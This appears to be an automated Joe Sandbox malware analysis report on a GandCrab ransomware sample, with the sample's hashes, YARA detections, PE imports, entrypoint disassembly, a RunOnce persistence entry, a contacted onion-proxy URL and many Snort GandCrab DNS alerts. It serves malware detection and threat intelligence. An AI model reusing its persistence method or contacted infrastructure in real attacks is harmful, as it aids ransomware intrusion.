http://gdcbghvjyqy7jclk.onion.top/5432c2cfc05a5a97	eW1QrimJYd.exe, 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmp	true	Avira URL Cloud: phishing	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	35.0.0 Citrine
Analysis ID:	694557
Start date and time:	2022-08-31 23:47:37 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 0s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	eW1QrimJYd.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	63
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.rans.troj.evad.winEXE@110/2@410/1
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 100% (good quality ratio 82%) Quality average: 70.4% Quality standard deviation: 36.5%
HCA Information:	Successful, ratio: 99% Number of executed functions: 40 Number of non-executed functions: 72
Cookbook Comments:	Found application associated with file extension: .exe Adjust boot time Enable AMSI

Warnings

Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, svchost.exe
Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, client.wns.windows.com, fs.microsoft.com, eudb.ris.api.iris.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
23:48:43	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce cfbtnelfyrp "C:\Users\user\AppData\Roaming\Microsoft\qvvfpl.exe"
23:48:47	API Interceptor	61x Sleep call for process: eW1QrimJYd.exe modified
23:48:54	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce cfbtnelfyrp "C:\Users\user\AppData\Roaming\Microsoft\qvvfpl.exe"

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\21c8026919fd094ab07ec3c180a9f210_d06ed635-68f6-4e9a-955c-4899f5f57b9a

Download File

Process:	C:\Users\user\Desktop\eW1QrimJYd.exe
File Type:	data
Category:	dropped
Size (bytes):	2221
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	8882037A0674A329B5AB8C870E58C422
SHA1:	FA2B896CE7908548EB54F6897A57DFCC9A333A49
SHA-256:	BF58499BF43BEC8D41F04779DAC5618A081455A657667C157DE019657224FEAD
SHA-512:	AAE711E67CAB35A320C533B2B939B1C171F9219B4813292F7CE0A64AF785679DDC23DBD61A3D31876558FA19C4E88D3DF845242C2210C226FB5D9D3DAECE6891
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\qvvfpl.exe

Download File

Process:	C:\Users\user\Desktop\eW1QrimJYd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	75264
Entropy (8bit):	6.466749493074102
Encrypted:	false
SSDEEP:	1536:155u555555555pmgSeGDjtQhnwmmB0ybMqqU+2bbbAV2/S2mr3IdE8mne0Avu5rJ:dMSjOnrmBTMqqDL2/mr3IdE8we0Avu5h
MD5:	E5E0C9F951E9947AEA55720B7D0299F2
SHA1:	9148294CFF65346DAE05816F89AB098028DB1E24
SHA-256:	06F88A3EBA2757CDB84315CEA92091049AE145F299D1A9D856C450CD2A6B42E3
SHA-512:	3A1F47F92D3AD8991A75A07DCE8615ACEC84258E9DBB60E12A621FB6AAAC28589783DA79F1C039D0DC15B637889EF361D130A78AA483A4671058194AA767BED7
Malicious:	true
Yara Hits:	Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: C:\Users\user\AppData\Roaming\Microsoft\qvvfpl.exe, Author: Florian Roth Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: C:\Users\user\AppData\Roaming\Microsoft\qvvfpl.exe, Author: Joe Security Rule: Gandcrab, Description: Gandcrab Payload, Source: C:\Users\user\AppData\Roaming\Microsoft\qvvfpl.exe, Author: kevoreilly
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......Y...D.us..dvx@ .Z<*......m<.rrj^....\|..(\|d.1...^.........:.Gn.^. ..%..(........e2.i>..a..b.<.QD........2...T..#Lr......7..t...Z.&Fv...;).s.,,.e....X?..%..RT.#.!..y$..l..G..]x]8i:.]n.....a.k..@..Mj..-a"......8_.....y.w.?PE..L...].vZ.............................J............@..........................`............@.................................p........@.......................P.......................................................................................text............................... ..`.rdata..............................@....data........ ......................@....CRT.........0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.466704339730406
TrID:	Win32 Executable (generic) a (10002005/4) 99.98% DOS Executable Generic (2002/1) 0.02%
File name:	eW1QrimJYd.exe
File size:	75264
MD5:	b7325e075262ffdeaa68cae94018cadb
SHA1:	2dee9b7321c736f73831ad5bc9be380b7c81680b
SHA256:	88a85792d16b3e48876aa0ea696784d045499a7ba8e7648d9bb7fb27e94b0ad2
SHA512:	0f7b3e11073023eb09bf3b603db80bd133ac9f51d58d64e6a954d0be2c298b0af1221ce5f8e5e31167e5f67037c62d29774db440f906e88c6a357342fce49203
SSDEEP:	1536:a55u555555555pmgSeGDjtQhnwmmB0ybMqqU+2bbbAV2/S2mr3IdE8mne0Avu5rJ:AMSjOnrmBTMqqDL2/mr3IdE8we0Avu5h
TLSH:	DF73391528D08223F6E3F977F5B47DE558397F8817883AEF10A254FA28251D24D39B8E
File Content Preview:	MZ.......Y...D.us..dvx@ .Z<*.......m<.rrj^.....\|..(\|d.1...^.........:.Gn.^. ...%..(..l.......e2.i>...a..b.<.QD..........2...T..#Lr.......7..t...Z.&Fv...;).s.,,.e.....X?..%..RT.#.!..y$..l..G..]x]8i:.]n.......a.k..@..Mj..-a"......8_.....y.w.?PE..L...].vZ...

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General

Entrypoint:	0x404af0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x5A76065D [Sat Feb 3 18:58:37 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	40306b615af659fc1f93cfb121cc38d9

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
call 00007F5D70CA565Dh
push 00000000h
call dword ptr [00409168h]
pop ebp
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
sub esp, 5Ch
push esi
push 00000044h
lea eax, dword ptr [ebp-58h]
xorps xmm0, xmm0
push 00000000h
push eax
mov esi, ecx
movdqu dqword ptr [ebp-10h], xmm0
call 00007F5D70CA98B7h
mov eax, dword ptr [00412B0Ch]
add esp, 0Ch
mov dword ptr [ebp-18h], eax
mov dword ptr [ebp-1Ch], eax
mov eax, dword ptr [00412B08h]
or dword ptr [ebp-2Ch], 00000101h
mov dword ptr [ebp-20h], eax
xor eax, eax
mov word ptr [ebp-28h], ax
lea eax, dword ptr [ebp-10h]
push eax
lea eax, dword ptr [ebp-58h]
mov dword ptr [ebp-58h], 00000044h
push eax
push 00000000h
push 00000000h
push 00000000h
push 00000001h
push 00000000h
push 00000000h
push esi
push 00000000h
call dword ptr [00409164h]
test eax, eax
jne 00007F5D70CA58BDh
call dword ptr [00409064h]
pop esi
mov esp, ebp
pop ebp
ret
push dword ptr [ebp-10h]
mov esi, dword ptr [0040910Ch]
call esi
push dword ptr [ebp-0Ch]
call esi
pop esi
mov esp, ebp
pop ebp
ret
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
sub esp, 10h
movq xmm0, qword ptr [0040FF2Ch]
mov al, byte ptr [0040FF34h]
push ebx
mov ebx, dword ptr [ebp+08h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x10970	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x14000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x15000	0xab0	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8000	0x8000	False	0.448028564453125	data	6.296861858288883	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x9000	0x9000	0x8600	False	0.45848880597014924	data	6.1322099086141595	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.data	0x12000	0x1000	0xc00	False	0.25390625	data	3.450195070880191	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT	0x13000	0x1000	0x200	False	0.03125	UTF-8 Unicode text, with no line terminators	0.06116285224115448	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x14000	0x1000	0x200	False	0.52734375	data	4.710061382693063	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x15000	0x1000	0xc00	False	0.7750651041666666	data	6.434410350416442	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_MANIFEST	0x14060	0x17d	XML 1.0 document text	English	United States

Imports

DLL	Import
KERNEL32.dll	SetFilePointer, GetFileAttributesW, ReadFile, GetLastError, MoveFileW, lstrcpyW, SetFileAttributesW, CreateMutexW, GetDriveTypeW, VerSetConditionMask, WaitForSingleObject, GetTickCount, InitializeCriticalSection, OpenProcess, GetSystemDirectoryW, TerminateThread, Sleep, TerminateProcess, VerifyVersionInfoW, WaitForMultipleObjects, DeleteCriticalSection, ExpandEnvironmentStringsW, lstrlenW, SetHandleInformation, lstrcatA, MultiByteToWideChar, CreatePipe, lstrcmpiA, Process32NextW, CreateToolhelp32Snapshot, LeaveCriticalSection, EnterCriticalSection, FindFirstFileW, lstrcmpW, FindClose, FindNextFileW, GetNativeSystemInfo, GetComputerNameW, GetDiskFreeSpaceW, GetWindowsDirectoryW, GetVolumeInformationW, LoadLibraryA, lstrcmpiW, VirtualFree, CreateThread, CloseHandle, lstrcatW, CreateFileMappingW, ExitThread, CreateFileW, GetModuleFileNameW, WriteFile, GetModuleHandleW, UnmapViewOfFile, MapViewOfFile, GetFileSize, GetEnvironmentVariableW, lstrcpyA, GetModuleHandleA, VirtualAlloc, Process32FirstW, GetTempPathW, GetProcAddress, GetProcessHeap, HeapFree, HeapAlloc, lstrlenA, CreateProcessW, ExitProcess, IsProcessorFeaturePresent
USER32.dll	wsprintfW, TranslateMessage, RegisterClassExW, LoadIconW, SetWindowLongW, EndPaint, BeginPaint, LoadCursorW, GetMessageW, ShowWindow, CreateWindowExW, SendMessageW, DispatchMessageW, DefWindowProcW, UpdateWindow, GetForegroundWindow, DestroyWindow
GDI32.dll	TextOutW
ADVAPI32.dll	CryptExportKey, AllocateAndInitializeSid, RegSetValueExW, RegCreateKeyExW, RegCloseKey, CryptAcquireContextW, CryptGetKeyParam, CryptReleaseContext, CryptImportKey, CryptEncrypt, CryptGenKey, CryptDestroyKey, GetUserNameW, RegQueryValueExW, RegOpenKeyExW, FreeSid
SHELL32.dll	SHGetSpecialFolderPathW, ShellExecuteExW, ShellExecuteW
CRYPT32.dll	CryptStringToBinaryA, CryptBinaryToStringA
WININET.dll	InternetCloseHandle, HttpAddRequestHeadersW, HttpSendRequestW, InternetConnectW, HttpOpenRequestW, InternetOpenW, InternetReadFile
PSAPI.DLL	EnumDeviceDrivers, GetDeviceDriverBaseNameW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.68.8.8.860695532026737 08/31/22-23:49:57.078873	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	60695	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.864649532026737 08/31/22-23:50:23.329807	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	64649	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.850255532829498 08/31/22-23:50:34.185397	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	50255	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.862039532829498 08/31/22-23:50:37.987567	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	62039	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.857518532829498 08/31/22-23:49:46.207614	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	57518	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.849468532026737 08/31/22-23:50:44.319184	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	49468	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.856571532829500 08/31/22-23:49:21.389711	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	56571	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.863674532829500 08/31/22-23:50:38.481064	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	63674	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.861613532829500 08/31/22-23:49:00.911463	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	61613	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.854197532829500 08/31/22-23:50:08.085752	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	54197	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.861175532026737 08/31/22-23:50:41.147699	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	61175	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.851324532829500 08/31/22-23:49:50.142801	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	51324	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.852486532026737 08/31/22-23:49:02.339569	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	52486	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.849335532829498 08/31/22-23:50:15.024115	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	49335	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.851891532829498 08/31/22-23:50:24.371077	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	51891	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.864544532026737 08/31/22-23:50:11.785305	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	64544	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.853945532829498 08/31/22-23:49:03.940196	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	53945	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.862852532829500 08/31/22-23:49:39.251383	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	62852	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.854906532829500 08/31/22-23:48:50.247066	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	54906	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.852869532829500 08/31/22-23:49:26.819001	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	52869	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.856360532829500 08/31/22-23:50:13.477447	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	56360	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.857327532026737 08/31/22-23:49:34.029795	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	57327	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.864652532026737 08/31/22-23:50:23.390728	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	64652	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.852847532026737 08/31/22-23:50:18.746734	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	52847	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.862850532829500 08/31/22-23:49:39.210928	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	62850	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.853198532829498 08/31/22-23:50:30.152335	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	53198	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.864408532829498 08/31/22-23:49:37.493948	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	64408	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.852845532026737 08/31/22-23:50:18.663879	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	52845	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.861173532026737 08/31/22-23:50:41.105316	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	61173	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.856435532829500 08/31/22-23:50:42.448009	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	56435	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.863265532829500 08/31/22-23:50:03.877266	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	63265	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.852818532829500 08/31/22-23:50:07.911995	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	52818	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.853195532829498 08/31/22-23:50:29.933502	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	53195	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.856551532026737 08/31/22-23:49:08.399946	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	56551	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.851777532829498 08/31/22-23:50:06.235822	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	51777	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.864801532829500 08/31/22-23:50:34.885486	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	64801	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.862734532829500 08/31/22-23:49:54.828233	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	62734	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.852484532026737 08/31/22-23:49:02.302880	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	52484	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.855958532026737 08/31/22-23:49:42.850589	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	55958	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.863672532829500 08/31/22-23:50:38.440019	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	63672	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.849234532026737 08/31/22-23:49:22.846612	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	49234	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.854881532829498 08/31/22-23:50:45.644561	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	54881	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.852867532829500 08/31/22-23:49:26.766420	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	52867	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.860011532829500 08/31/22-23:50:33.089754	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	60011	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.851365532026737 08/31/22-23:50:14.017877	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	51365	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.863267532829500 08/31/22-23:50:03.917309	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	63267	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.856124532829498 08/31/22-23:48:57.941241	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	56124	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.862040532829498 08/31/22-23:50:38.007802	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	62040	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.864650532026737 08/31/22-23:50:23.349894	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	64650	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.862736532829500 08/31/22-23:49:54.873826	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	62736	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.862225532829498 08/31/22-23:50:03.325419	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	62225	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.860013532829500 08/31/22-23:50:33.131001	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	60013	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.854883532829498 08/31/22-23:50:45.681352	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	54883	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.853592532829498 08/31/22-23:50:12.408515	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	53592	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.856363532829500 08/31/22-23:50:13.551243	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	56363	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.851775532829498 08/31/22-23:50:06.195982	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	51775	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.859883532829498 08/31/22-23:49:13.365736	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	59883	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.854513532026737 08/31/22-23:50:28.034455	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	54513	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.855634532829498 08/31/22-23:49:19.687489	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	55634	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.856574532829500 08/31/22-23:49:21.461712	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	56574	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.856754532829498 08/31/22-23:49:57.581695	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	56754	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.853947532829498 08/31/22-23:49:03.979774	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	53947	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.854510532026737 08/31/22-23:50:25.933530	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	54510	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.855960532026737 08/31/22-23:49:42.892259	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	55960	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.864799532829500 08/31/22-23:50:34.845123	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	64799	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.862539532026737 08/31/22-23:50:35.857432	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	62539	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.859885532829498 08/31/22-23:49:13.407922	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	59885	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.855632532829498 08/31/22-23:49:19.646853	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	55632	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.864407532829498 08/31/22-23:49:37.460209	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	64407	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.853196532829498 08/31/22-23:50:30.011263	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	53196	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.856549532026737 08/31/22-23:49:08.357396	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	56549	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.858920532829500 08/31/22-23:49:15.820662	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	58920	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.853044532829500 08/31/22-23:50:24.850862	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	53044	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.851534532026737 08/31/22-23:48:55.046078	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	51534	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.858160532829500 08/31/22-23:50:17.191071	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	58160	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.852718532026737 08/31/22-23:50:01.216655	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	52718	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.862223532829498 08/31/22-23:50:03.241400	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	62223	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.853045532829500 08/31/22-23:50:24.871066	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	53045	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.850348532026737 08/31/22-23:49:17.376161	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	50348	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.860693532026737 08/31/22-23:49:57.038533	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	60693	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.864963532829498 08/31/22-23:50:19.837606	UDP	2829498	ETPRO TROJAN GandCrab DNS Lookup 1	64963	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.864798532829500 08/31/22-23:50:34.824859	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	64798	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.854511532026737 08/31/22-23:50:27.946240	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	54511	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.852717532026737 08/31/22-23:50:01.196442	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	52717	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.856552532026737 08/31/22-23:49:08.420766	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	56552	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.851366532026737 08/31/22-23:50:14.041221	UDP	2026737	ET TROJAN Observed GandCrab Domain (gandcrab .bit)	51366	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.860010532829500 08/31/22-23:50:33.071442	UDP	2829500	ETPRO TROJAN GandCrab DNS Lookup 3	60010	53	192.168.2.6	8.8.8.8
